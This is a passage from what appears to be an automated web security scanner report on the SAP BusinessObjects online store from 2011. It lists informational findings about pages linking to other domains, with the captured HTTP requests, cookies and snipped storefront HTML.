</a> <img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span class="last">
...[SNIP]...
<a href="#" onClick="javascript:window.print()" class="print"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/print_icon.gif" alt="Printer Friendly" /></a>
...[SNIP]...
<a href="javascript:openEmailThisPageForm();" class="email lbOn"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/emailIcon_r2_c2.jpg" alt="Email page" /></a>
...[SNIP]...
<div id="dr_thumbnailImage">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/bobjamer/images/product/detail/screenshots/SAP_Crystal_Reports_Server160x160.jpg" border="0" alt="Buy SAP Crystal Server upgrade, 5 named user licenses" />
</div>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a class="dr_ShareLink" href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=ra-4e3f99bf74164a4e" onClick="return false;" onMouseOver="return addthis_open(this, '', '[URL]', '[TITLE]');" onMouseOut="addthis_close();">Share</a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pubid=ra-4e3f99bf74164a4e"></script>
...[SNIP]...
<li class="dr_Like"><iframe src="http://www.facebook.com/plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2FparentCategoryID.57065700%2FproductID.231860100%2FEnv.BASE%2FStyleID.39233700%2FESIHC.79df07d6%2FCurrency.USD&amp;layout=button_count&amp;show_faces=false&amp;width=150&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;"></iframe>
...[SNIP]...
<div id="dr_details_column2_content" class="dr_content"> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7"><img style="border: 0px solid; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7 " title=" ">CRS Explore, Manage, and Share Critical Business Information</a>
...[SNIP]...
<br /> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E "><img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E " title=" ">Comparison of Features by Version</a>
...[SNIP]...
<a href="http://www.businessobjects.com/jump/xi/dev_roundup/forrester.pdf" target="_blank"> <img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a>
...[SNIP]...
<br /> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794 "><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794" title=" ">SAP Crystal Solutions What...s New in 2011</a><br /> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D"><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D" title=" ">SAP Crystal Solutions 2011 FAQ</a>
...[SNIP]...
<p>Visit our <a href="http://www.sap.com/solutions/sapbusinessobjects/sap-crystal-solutions/information-infrastructure/sapcrystalserver/licensing/index.epx" target="_blank">SAP Crystal Reports Server licensing terms</a>
...[SNIP]...
<p class="right-rail-link"><a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore" target="_new">Get a Trial ...</a>
...[SNIP]...
<p class="right-rail-link"><a href="http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx?xsite=CG4D9F644F" target="_blank">Find a Reseller ...</a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
                       <noscript><img src="https://roiengine.sap.com/p.pl?a=10002109824374&js=no" width="1" height="1"></noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.9. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayPage&SiteID=bobjamer&Locale=en_US&Env=BASE&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; fcPT=http%3A//store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0&E=1135861&F=0&I=1318689068696; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690873782%3B%20pe%3DprodView%7C1318690873784%3B%20c3%3Dno%2520value%7C1318690873787%3B%20s_nr%3D1318689073796-New%7C1321281073796%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292673798%3B%20s_visit%3D1%7C1318690873800%3B%20gpv_p47%3Dno%2520value%7C1318690873803%3B; s_sess=%20s_cc%3Dtrue%3B%20v13%3DCG4E7A594%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=96208778307,0)
Date: Sat, 15 Oct 2011 14:57:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 40700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>


<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39139200&StyleVersion=5&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=a4bb5d41&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39139200&StyleVersion=5&ceid=176519300&cename=TopHeader&id=ServerErrorPage"
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.10. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&parentCategoryID=57065700&categoryID=57066300&productID=231860100 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690909272%3B%20pe%3DprodView%252Cevent18%7C1318690909274%3B%20c3%3Dno%2520value%7C1318690909280%3B%20s_nr%3D1318689109286-New%7C1321281109286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292709289%3B%20s_visit%3D1%7C1318690909291%3B%20gpv_p47%3Dno%2520value%7C1318690909293%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689109320

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=396856722578,0)
Date: Sat, 15 Oct 2011 15:01:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>


<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=65f38917&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&categoryID=57066300&ceid=176519300&cename=TopHeader
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
</a> <img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span class="last">
...[SNIP]...
<a href="#" onClick="javascript:window.print()" class="print"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/print_icon.gif" alt="Printer Friendly" /></a>
...[SNIP]...
<a href="javascript:openEmailThisPageForm();" class="email lbOn"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/emailIcon_r2_c2.jpg" alt="Email page" /></a>
...[SNIP]...
<div id="dr_thumbnailImage">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/bobjamer/images/product/detail/screenshots/SAP_Crystal_Reports_Server160x160.jpg" border="0" alt="Buy SAP Crystal Server upgrade, 5 named user licenses" />
</div>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a class="dr_ShareLink" href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=ra-4e3f99bf74164a4e" onClick="return false;" onMouseOver="return addthis_open(this, '', '[URL]', '[TITLE]');" onMouseOut="addthis_close();">Share</a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pubid=ra-4e3f99bf74164a4e"></script>
...[SNIP]...
<li class="dr_Like"><iframe src="http://www.facebook.com/plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2FStyleVersion.7%2Fceid.173834100%2Fcename.ProductDetails%2FcategoryID.57066300%2FparentCategoryID.57065700%2FproductID.231860100%2FEnv.BASE%2FStyleID.39233700%2FESIHC.cf7c120c%2FCurrency.USD&amp;layout=button_count&amp;show_faces=false&amp;width=150&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;"></iframe>
...[SNIP]...
<div id="dr_details_column2_content" class="dr_content"> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7"><img style="border: 0px solid; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7 " title=" ">CRS Explore, Manage, and Share Critical Business Information</a>
...[SNIP]...
<br /> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E "><img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E " title=" ">Comparison of Features by Version</a>
...[SNIP]...
<a href="http://www.businessobjects.com/jump/xi/dev_roundup/forrester.pdf" target="_blank"> <img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a>
...[SNIP]...
<br /> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794 "><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794" title=" ">SAP Crystal Solutions What...s New in 2011</a><br /> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D"><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D" title=" ">SAP Crystal Solutions 2011 FAQ</a>
...[SNIP]...
<p>Visit our <a href="http://www.sap.com/solutions/sapbusinessobjects/sap-crystal-solutions/information-infrastructure/sapcrystalserver/licensing/index.epx" target="_blank">SAP Crystal Reports Server licensing terms</a>
...[SNIP]...
<p class="right-rail-link"><a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore" target="_new">Get a Trial ...</a>
...[SNIP]...
<p class="right-rail-link"><a href="http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx?xsite=CG4D9F644F" target="_blank">Find a Reseller ...</a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
                       <noscript><img src="https://roiengine.sap.com/p.pl?a=10002109824374&js=no" width="1" height="1"></noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.11. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
